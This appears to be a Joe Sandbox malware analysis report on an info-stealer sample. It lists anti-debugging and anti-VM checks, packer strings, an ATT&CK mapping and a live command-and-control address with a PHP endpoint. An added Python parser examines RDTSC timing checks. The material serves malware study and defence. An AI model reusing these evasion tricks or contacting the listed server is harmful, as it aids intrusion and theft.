              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0D94 second address: 4A0D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0D9A second address: 4A0D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
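Each "RDTSC instruction interceptor" line above records one pair of consecutive RDTSC reads and the instructions the sample executed between them. Read as a group they show what the timing check is actually measuring: the gap is almost entirely push/pop pairs, pushad/popad and never-taken conditional jumps, the stack-neutral filler that the WinLicense/Oreans strings in the memory dump (Oreans.vxd, Software\WinLicense) would lead one to expect. The parser below is an added example, not part of the Joe Sandbox report or of the sample. It reads those lines, checks the listing invariant (the final rdtsc must sit exactly second minus first bytes after the first one, otherwise the listing was truncated) and reports the net stack movement and branch count of the gap. The input lines are taken from the report above; only the interpretation in the comments is mine.

```python
"""Parse Joe Sandbox 'RDTSC instruction interceptor' lines (added example).

Each line records two consecutive RDTSC executions and the instructions the
sample ran between them. Summarising the gap shows what the timing check is
measuring: here, mostly stack-neutral filler.
"""
import re
from dataclasses import dataclass

LINE_RE = re.compile(
    r"First address:\s*([0-9A-Fa-f]+)\s+second address:\s*([0-9A-Fa-f]+)"
    r"\s+instructions:\s*(.+)$"
)
# Every instruction in the listing is prefixed with its 8-digit hex offset.
OFFSET_RE = re.compile(r"\s*0x([0-9a-f]{8})\s+")

# Net dwords pushed by each mnemonic on 32-bit x86 (anything else: 0).
STACK_EFFECT = {
    "push": +1, "pop": -1, "pushad": +8, "popad": -8,
    "pushfd": +1, "popfd": -1, "call": +1, "ret": -1,
}


@dataclass
class RdtscWindow:
    first: int      # address of the first rdtsc
    second: int     # address of the second rdtsc
    insns: list     # [(offset, "mnemonic operands"), ...] as listed

    @property
    def span(self) -> int:
        """Bytes of code between the two RDTSC instructions."""
        return self.second - self.first

    def listing_complete(self) -> bool:
        """Consistent only if the last entry is the second rdtsc and it sits
        exactly `span` bytes after the first one."""
        off, text = self.insns[-1]
        return text == "rdtsc" and off == self.span

    def gap(self) -> list:
        """Instructions executed between the two reads."""
        return [text for _, text in self.insns[1:-1]]

    def net_pushes(self) -> int:
        """Net stack movement of the gap in dwords (0 = stack-neutral)."""
        return sum(STACK_EFFECT.get(t.split()[0], 0) for t in self.gap())

    def branch_count(self) -> int:
        """Jumps inside the gap; the interceptor listed them as fall-through."""
        return sum(1 for t in self.gap() if t.split()[0].startswith("j"))


def parse_line(line: str) -> RdtscWindow:
    m = LINE_RE.search(line)
    if m is None:
        raise ValueError("not an RDTSC interceptor line: %r" % line[:60])
    first, second = int(m.group(1), 16), int(m.group(2), 16)
    # re.split keeps the captured offsets: ['', off, insn, off, insn, ...]
    parts = OFFSET_RE.split(m.group(3).strip())
    insns = [(int(off, 16), text.strip())
             for off, text in zip(parts[1::2], parts[2::2])]
    return RdtscWindow(first, second, insns)


def summarize(lines) -> list:
    """One summary dict per interceptor line, in input order."""
    out = []
    for line in lines:
        w = parse_line(line)
        out.append({
            "first": "%X" % w.first,
            "span": w.span,
            "complete": w.listing_complete(),
            "gap_len": len(w.gap()),
            "net_pushes": w.net_pushes(),
            "branches": w.branch_count(),
        })
    return out


# Lines taken from the report above (not constructed).
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54BB9A second address: 54BB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54BBDC second address: 54BBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 562360 second address: 562374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FB560CBB7FCh 0x0000000e jnl 00007FB560CBB7F6h 0x00000014 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59125F second address: 591264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc",
]

if __name__ == "__main__":
    for row in summarize(REPORT_LINES):
        print(row)
```

The gap lengths are a few bytes to a few dozen bytes, so on bare metal the two reads differ by a handful of cycles; under single-stepping or a trapping hypervisor the difference is orders of magnitude larger, which is the signal the check keys on. Note that the "pop edx / pop eax" at the start and "push eax / push edx" at the end of most windows restore and re-save the register pair RDTSC writes to, so the per-window net stack movement is not zero on its own; only the sequence as a whole balances.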
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 2EFC06 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 4BAB6F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 52879C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Evaded block: after key decision graph_0-27083
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTime,DecisionNodes graph_0-27156
Source: C:\Users\user\Desktop\file.exe API coverage: 4.7 %
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000B18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose, 0_2_000B18A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000B3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_000B3910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000BE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose, 0_2_000BE210
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000B1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_000B1250
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000B1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_000B1269
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000B4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_000B4B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000B4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA, 0_2_000B4B29
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000ADB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_000ADB80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000ADB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_000ADB99
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000B2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA, 0_2_000B2390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000B23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA, 0_2_000B23A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000BCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose, 0_2_000BCBE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000BDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy, 0_2_000BDD30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000BD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_000BD530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000A16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose, 0_2_000A16A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000A16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA, 0_2_000A16B9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000C1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess, 0_2_000C1BF0
Source: file.exe, file.exe, 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2179287907.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWM|
Source: file.exe, 00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2179287907.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2179287907.0000000000E92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-25895
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-25759
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-25741
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-25888
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-25908
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000A4A60 VirtualProtect 00000000,00000004,00000100,? 0_2_000A4A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_000C6390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000C6390 mov eax, dword ptr fs:[00000030h] 0_2_000C6390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000C2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_000C2A40
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 3668, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000C4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000C46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000C2D60 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000C1B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000C2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000C2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2127364096.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3668, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2127364096.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3668, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix, listed per tactic (a number in parentheses is the count of matched signatures for that technique; techniques without a number had no match):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (13); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Create Account (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
No Antivirus matches
Name | IP | Active | Malicious | Reputation
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | high
Name | Malicious | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | high
http://185.215.113.206/ | false | high
Name | Source | Malicious | Reputation
http://185.215.113.206/c4becf79229cb002.phpl | file.exe, 00000000.00000002.2179287907.0000000000E92000.00000004.00000020.00020000.00000000.sdmp | false | high
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp | false | high
http://185.215.113.206 | file.exe, 00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp | false | high
http://185.215.113.206/; | file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp | false | high
http://185.215.113.206/c4becf79229cb002.phpT | file.exe, 00000000.00000002.2179287907.0000000000E92000.00000004.00000020.00020000.00000000.sdmp | false | high
http://185.215.113.206/) | file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp | false | high
http://185.215.113.206/c4becf79229cb002.phpv | file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1559918
                                  Start date and time:2024-11-21 06:22:08 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 17s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
